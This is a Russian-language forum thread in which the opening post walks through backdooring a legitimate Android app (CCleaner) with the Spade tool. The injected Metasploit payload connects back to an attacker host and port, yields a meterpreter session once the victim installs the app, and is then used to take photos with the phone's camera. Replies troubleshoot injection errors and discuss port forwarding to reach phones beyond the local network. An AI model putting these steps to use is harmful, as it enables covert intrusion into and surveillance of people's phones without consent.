Взлом Android-устройства

Vander

Well-Known Member
Администратор
16.01.2016
967
2 264
28
#1
Привет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом.

Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
, попробуем, для начала, на ней.

Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее:
Код:
git clone https://github.com/suraj-root/spade.git
upload_2016-10-17_20-20-41.png

После успешного выполнения команды, вводим следующее:

> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)

После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.

> lhost > 192.168.0.103

> lport > 4444

upload_2016-10-17_20-21-32.png

upload_2016-10-17_20-21-40.png

Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.

upload_2016-10-17_20-22-6.png

Видим привилегии, которые нам доступны:

upload_2016-10-17_20-22-32.png

Готовый файл сохраняется в директории /root/spade

upload_2016-10-17_20-22-51.png

На запрос этой настройки отвечаем утвердительно:

upload_2016-10-17_20-23-18.png

Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:

upload_2016-10-17_20-23-36.png

Попробуем осмотреться в системе:

upload_2016-10-17_20-23-55.png

Все работает, теперь можно испытать работу, к примеру, камеры:
Код:
webcam_snap
upload_2016-10-17_20-24-23.png

И эта команда срабатывает успешно:

upload_2016-10-17_20-24-45.png

На этом все, спасибо за внимание.

Данная статья опубликована исключительно в ознакомительных целях и не является руководством к действиям.
Ссылка на оригинал -
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
 
Последнее редактирование:
21.09.2016
39
55
29
Оттуда
#2
за статью спасибо , познавательно. Глаза от стольких мониторов не разбегаются?):eek:
 

z3RoTooL

Well-Known Member
Red Team
28.02.2016
615
438
#4
Наши с тобой темы часто перекликаются :) Чтоб не плодить одно и то же, я добавлю к твоему рассказу ещё одну софтину для этих целей. Написана на RUBY, скачать можно прям отсюда.
Ну и небольшой видео обзор к ней.
Работаем в команде )))

 

Вложения

Последнее редактирование:
Симпатии: Понравилось Vander

Vander

Well-Known Member
Администратор
16.01.2016
967
2 264
28
#5
Наши с тобой темы часто перекликаются :) Чтоб не плодить одно и то же, я добавлю к твоему рассказу ещё одну софтину для этих целей. Написана на RUBY, скачать можно прям отсюда.
Ну и небольшой видео обзор к ней.

:) Ага, надо протестить на досуге
 

areez

Member
18.10.2016
12
5
22
#14
Господа, проблема возникла
на стадии пэйлода выдает такое и все тут
[*] Injecting payload...
mkdir: невозможно создать каталог «CCleaner_v1/smali/com/metasploit»: Нет такого файла или каталога
mkdir: невозможно создать каталог «CCleaner_v1/smali/com/metasploit/stage»: Нет такого файла или каталога
cp: указанная цель 'CCleaner_v1/smali/com/metasploit/stage/' не является каталогом
[-] [Errno 2] No such file or directory: 'CCleaner_v1/AndroidManifest.xml'
Пробовал разные апк, в пустую
 

Vander

Well-Known Member
Администратор
16.01.2016
967
2 264
28
#15
Господа, проблема возникла
на стадии пэйлода выдает такое и все тут
[*] Injecting payload...
mkdir: невозможно создать каталог «CCleaner_v1/smali/com/metasploit»: Нет такого файла или каталога
mkdir: невозможно создать каталог «CCleaner_v1/smali/com/metasploit/stage»: Нет такого файла или каталога
cp: указанная цель 'CCleaner_v1/smali/com/metasploit/stage/' не является каталогом
[-] [Errno 2] No such file or directory: 'CCleaner_v1/AndroidManifest.xml'
Пробовал разные апк, в пустую
Привет, скриншот бы увидеть...
 

MAdDog719

Well-Known Member
Премиум
16.08.2016
108
26
30
#18
я так понимаю что если указать внешний IP и на роутере настроить правило переадресации порта на машину с кали (ну как это было рассказано в статье по Veali и Office) тогда смартфрну не нужуно будет находиться с мной в одной сети(подключенными к одному роутеру)? Сессия будет открыта как только как только запустишь приложение на смартфоне.
 

areez

Member
18.10.2016
12
5
22
#19
Опишите пожалуйста решение.
файл был дюже длинного названия, судя по всему, т.е. ccleaner_v1234... и тд , я попросту переименовал файл в ccleaner.apk и все

ПРоблема с отсутсвием ссleaner-final.apk АКТУальна!
 
Последнее редактирование:

Vander

Well-Known Member
Администратор
16.01.2016
967
2 264
28
#20
я так понимаю что если указать внешний IP и на роутере настроить правило переадресации порта на машину с кали (ну как это было рассказано в статье по Veali и Office) тогда смартфрну не нужуно будет находиться с мной в одной сети(подключенными к одному роутеру)? Сессия будет открыта как только как только запустишь приложение на смартфоне.
По идее, должно работать. Но не проверял. Если проверите, отпишитесь потом, пожалуйста